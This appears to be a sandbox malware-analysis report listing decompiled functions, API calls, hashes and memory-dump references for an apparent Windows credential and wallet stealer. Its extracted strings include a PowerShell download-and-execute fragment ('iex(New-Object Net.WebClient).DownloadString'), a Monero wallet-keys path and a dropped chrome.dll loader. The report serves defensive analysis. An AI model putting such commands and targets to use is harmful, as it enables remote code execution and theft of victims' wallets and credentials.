                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 94b9691ca324c925388f65a57d2fdba03e430d52266ec9620f69151fc60fde41
                                  • Instruction ID: 015e34d8a81e0fc0e9cc9e380db6de2d4a362ee7dc9a148948890f3e380389df
                                  • Opcode Fuzzy Hash: 94b9691ca324c925388f65a57d2fdba03e430d52266ec9620f69151fc60fde41
                                  • Instruction Fuzzy Hash: F63154F290020CA7DF15E7B0DC99EED733CAB48700F404689B305A6152DEB89BC9CB95
                                  Function 007F2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F2FD5
                                  Strings
                                  • <, xrefs: 007F2F89
                                  • ')", xrefs: 007F2F03
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 007F2F54
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 007F2F14
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: c676bf781e0ee064279dad03140f650fcfb7071197aff2a857459c0a59e496e5
                                  • Instruction ID: 91cd54b9adb893235d4b8904eda18ed6cbd3301828718596ed8a47d88c387ee5
                                  • Opcode Fuzzy Hash: c676bf781e0ee064279dad03140f650fcfb7071197aff2a857459c0a59e496e5
                                  • Instruction Fuzzy Hash: D741EDB191020CEADB14EFA0C8A6BFDB779AF14300F404559E219B6292DF792A49CF61
                                  Function 0085CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: 2f5066c365603bd8a1a48e0bb4b01a8530682a471deeb5e395d15ea4ffbab9f8
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: 42218E72D00758AFDB329E59CC419AF3A79FB81B96F054159FC09EB211D3348D498FA1
                                  Function 007F6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 007F6C0C
                                  • sscanf.NTDLL ref: 007F6C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F6C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F6C60
                                  • ExitProcess.KERNEL32 ref: 007F6C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 507fb2448d7681e92da61c838fca8f3dba48626b915a19cff1e42f492e0e5ee2
                                  • Instruction ID: e77908995da80806038e7c916780f864179d052c8f53792a82c534cac8a130bf
                                  • Opcode Fuzzy Hash: 507fb2448d7681e92da61c838fca8f3dba48626b915a19cff1e42f492e0e5ee2
                                  • Instruction Fuzzy Hash: D621CDB5D1420CABCF04DFE4E8459EEB7B5BF48300F048529E506B3261EB749604CB65
                                  Function 007F7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,0144BB98,00000000,00020119,?), ref: 007F7FEE
                                  • RegQueryValueExA.ADVAPI32(?,0145D498,00000000,00000000,000000FF,000000FF), ref: 007F800F
                                  • RegCloseKey.ADVAPI32(?), ref: 007F8022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: e674171acf5c5d2dbd7cf933a736ac35b25b8ed54b8197c7c66f37213823a9ea
                                  • Instruction ID: 9ad4e2ffa79ec15a9cf39190b26ff73ef628d583dc94a7e41fd657762854b283
                                  • Opcode Fuzzy Hash: e674171acf5c5d2dbd7cf933a736ac35b25b8ed54b8197c7c66f37213823a9ea
                                  • Instruction Fuzzy Hash: B6118CB1A48209ABDB00CFD4DD45FBFBBB8FB44B10F104219F615A73A1DBB958018BA1
                                  Function 007F93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(0145DC98,00000000,00000000,?,007E9F71,00000000,0145DC98,00000000), ref: 007F93FC
                                  • lstrcpyn.KERNEL32(00AB7580,0145DC98,0145DC98,?,007E9F71,00000000,0145DC98), ref: 007F9420
                                  • lstrlen.KERNEL32(00000000,?,007E9F71,00000000,0145DC98), ref: 007F9437
                                  • wsprintfA.USER32 ref: 007F9457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 5c9ce24db1f255992cb4c0c39cc7d274408269a4e42dfd5a7064062c8cf4f239
                                  • Instruction ID: eb9aaf084db80a9cee3d339884cc93ecf0a0931f1c02783e0003c5684d0937a7
                                  • Opcode Fuzzy Hash: 5c9ce24db1f255992cb4c0c39cc7d274408269a4e42dfd5a7064062c8cf4f239
                                  • Instruction Fuzzy Hash: 22010875508108FFCB04DFA8D948AAE7B78EB88304F108348FA099B356D671AA41DBA0
                                  Function 007E12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E12B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E12BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E12D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E12F5
                                  • RegCloseKey.ADVAPI32(?), ref: 007E12FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: dbfae9b4d4fa0acc8adc9ceffe0f15cfc0d0a0bfc3cff9be94ed9fd8c6c34502
                                  • Instruction ID: 3f35f9074b415c87aea63090f19d96c4cf9d58869a8f37f80dff32c4d885625b
                                  • Opcode Fuzzy Hash: dbfae9b4d4fa0acc8adc9ceffe0f15cfc0d0a0bfc3cff9be94ed9fd8c6c34502
                                  • Instruction Fuzzy Hash: F1013179A44209BFDB00DFE4DC49FAE777CFB88700F004294FA05A7291DBB09A018BA0
                                  Function 007F68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007F6903
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F69C6
                                  • ExitProcess.KERNEL32 ref: 007F69F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 114b30758bf158cf9656fa53ffb20192ca2197449857c084ffedda2905785c15
                                  • Instruction ID: 05b3513f0a2aabcaf811a5733a20007e38f4b7ff3ab0f3fd96dc4417544a82e3
                                  • Opcode Fuzzy Hash: 114b30758bf158cf9656fa53ffb20192ca2197449857c084ffedda2905785c15
                                  • Instruction Fuzzy Hash: 54313CF1901218EBDB15EB90DC95FEDB778AF44300F404188F309662A1DF786A48CF69
                                  Function 007F8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00800E10,00000000,?), ref: 007F89BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F89C6
                                  • wsprintfA.USER32 ref: 007F89E0
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 13672faa1151c2f08421de85165e4e6215d3e1f1ab37a8dc0f10e00e7d0578d2
                                  • Instruction ID: 586df9bce244e0d914e82feb36d6670f9943b15777f9f9b2c16699c9ef10bf9f
                                  • Opcode Fuzzy Hash: 13672faa1151c2f08421de85165e4e6215d3e1f1ab37a8dc0f10e00e7d0578d2
                                  • Instruction Fuzzy Hash: 37212EB1A44208AFDB00DFD8DD45FAEBBB8FB48711F104219F615A73D1C77999018BA1
                                  Function 007EA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007EA098
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: f979062c1975585a2ec5332b9f033587e1bf0fba781a94b0673c7231afc7310f
                                  • Instruction ID: 41e871c75545bda52b46d268715137bdad3be79887a4ce677263647b0310d22d
                                  • Opcode Fuzzy Hash: f979062c1975585a2ec5332b9f033587e1bf0fba781a94b0673c7231afc7310f
